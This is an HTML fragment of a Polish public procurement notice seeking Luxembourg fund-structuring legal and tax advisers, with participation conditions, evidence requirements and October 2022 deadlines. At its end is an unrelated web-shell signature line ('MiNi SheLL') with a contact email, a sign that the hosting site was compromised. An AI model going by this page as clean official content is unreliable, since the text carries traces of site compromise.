mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga wykazania przez wykonawcę ubiegającego się o udzielenia zamówienia, spełnienia warunków udziału w postępowaniu dotyczących:<br/>zdolności technicznej lub zawodowej:<br/>a)	Wykonawca w celu spełnienia warunku udziału w postępowaniu musi wykazać, <br/>że w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie co najmniej 2 (dwie) usługi zakończone lub trwające nadal, o wartości minimum 90 000,00 zł (słownie złotych: dziewięćdziesiąt tysięcy 00/100) brutto każda, polegające na:<br/>- świadczeniu usług doradztwa przy transakcjach typu „fund structuring” pod prawem luksemburskim, w tym świadczenia usług na rzecz prywatnych lub publicznych funduszy inwestycyjnych private equity/venture capital, w tym funduszu funduszy, w zakresie strukturyzacji warunków umowy inwestycyjnej (LPA) lub side letters, lub <br/>- świadczeniu usług doradztwa prawnego, w tym podatkowego dla inwestorów przy przystępowaniu do i wykonywaniu umów inwestycyjnych (LPA) lub side letter pod prawem luksemburskim, dotyczącej współpracy stron w okresie co najmniej 10 lat o wartości zobowiązań stron co najmniej 100.000.000 PLN.<br/>W przypadku usług trwających nadal wykonawca musi wykazać, że do terminu składania ofert wykonał usługi o wartości co najmniej 90 000,00 zł (słownie złotych: dziewięćdziesiąt tysięcy 00/100) brutto (każda z usług).<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, zamawiający nie dopuszcza łączenia usług i ich wartości, a co najmniej jeden z wykonawców musi spełniać powyższy warunek samodzielnie.<br/>b)	Wykonawca w celu spełnienia warunku udziału w postępowaniu musi wykazać, <br/>że dysponuje zespołem skierowanym do wykonania zamówienia, składającym się z co najmniej 3 (trzech) osób, które posiadają uprawnienia do wykonywania zawodu adwokata lub radcy prawnego, zgodnie z ustawą z dnia 26 maja 1982 r. Prawo o adwokaturze lub ustawą z dnia 6 lipca 1982 r. o radcach prawnych, albo co najmniej 2 (dwóch) osób posiadających uprawnienia do wykonywania zawodu adwokata lub radcy prawnego zgodnie z powyższą ustawą i 1 (jednej) osoby posiadającej uprawnienia do wykonywania zawodu doradcy podatkowego, zgodnie z ustawą z dnia 5 lipca 1996 r. o doradztwie podatkowym w tym:<br/>- minimum 1 (jedną) osobą, która posiada co najmniej roczne doświadczenie zawodowe (tj. doświadczenie zdobyte po uzyskaniu uprawnień zawodowych) polegające na świadczeniu usług doradztwa przy transakcjach typu „fund structuring” pod prawem luksemburskim, w tym świadczenia usług na rzecz prywatnych lub publicznych funduszy inwestycyjnych private equity/venture capital, w tym funduszy, w zakresie strukturyzacji warunków umowy inwestycyjnej (LPA) lub side letters, lub <br/>- minimum 1 (jedną) osobą, która posiada co najmniej roczne doświadczenie zawodowe (tj. doświadczenie zdobyte po uzyskaniu uprawnień zawodowych) polegające na świadczeniu usług doradztwa prawnego, w tym podatkowego dla inwestorów przy przystępowaniu do i wykonywaniu umów inwestycyjnych (LPA) lub side letter pod prawem luksemburskim, dotyczącej współpracy stron w okresie co najmniej 10 lat o wartości zobowiązań stron co najmniej 100.000.000 PLN<br/>Przez „doświadczenie zawodowe” zamawiający rozumie lata czynne zawodowo w wykonywaniu zawodu radcy prawnego lub adwokata lub doradcy podatkowego. Spośród osób wskazanych w wykazie, wykonawca winien wskazać jedną osobę, która będzie pełnić funkcję kierownika zespołu, odpowiedzialnego za kontakt z zamawiającym oraz zastępcę kierownika zespołu. Jedna osoba może spełniać więcej niż jedno z ww. wymagań. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych: <br/>1)	aktualnych na dzień złożenia odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>2)	oświadczenia w zakresie wykazania, że wykonawca nie podlega wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835) - wg wzoru stanowiącego załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu zamawiający żąda następujących podmiotowych środków dowodowych: <br/>1)	wykazu usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane (zgodnie ze wzorem stanowiącym załącznik nr 10 do SWZ) oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane,<br/>2)	wykazu osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wg wzoru stanowiącego załącznik nr 11 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty i oświadczenia, które należy złożyć wraz z ofertą:<br/>1)	formularz ofertowy – załącznik nr 1 do SWZ;<br/>2)	oświadczenie dotyczące przesłanek wykluczenia z postępowania – załącznik nr 4 do SWZ;<br/>3)	oświadczenie dotyczące spełnienia warunków udziału w postępowaniu – załącznik nr 5 do SWZ.<br/>4)	pełnomocnictwo / pełnomocnictwa dla osoby / osób podpisujących ofertę, jeżeli oferta jest podpisana przez pełnomocnika (jeżeli dotyczy).<br/>W przypadku składania oferty przez wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia – pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy <br/>– pełnomocnictwo może być sporządzone wg wzoru stanowiącego załącznik nr 6 do SWZ. <br/>Pełnomocnik może być ustanowiony do reprezentowania wykonawców <br/>w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy.<br/>5)	oświadczenie, o którym mowa w art. 117 ust. 4 ustawy pzp – załącznik nr 7 do SWZ (w przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia).<br/>6)	zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy pzp – załącznik nr 8 do SWZ (jeśli wykonawca powołuje się na zasoby innego podmiotu). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (dotyczy również wspólników spółki cywilnej), oświadczenie o spełnianiu warunków udziału w postepowaniu składa każdy z wykonawców.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy będą odpowiedzialni za wykonanie danego zakresu zamówienia.<br/>W przypadku, o którym mowa powyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy, zgodnie ze wzorem stanowiącym załącznik nr 7 do SWZ (oświadczenie, o którym mowa w art. 117 ust. 4 ustawy pzp). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-19 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z załącznikami na platformie zakupowej pod adresem: https://portal.smartpzp.pl/mon, na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-19 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com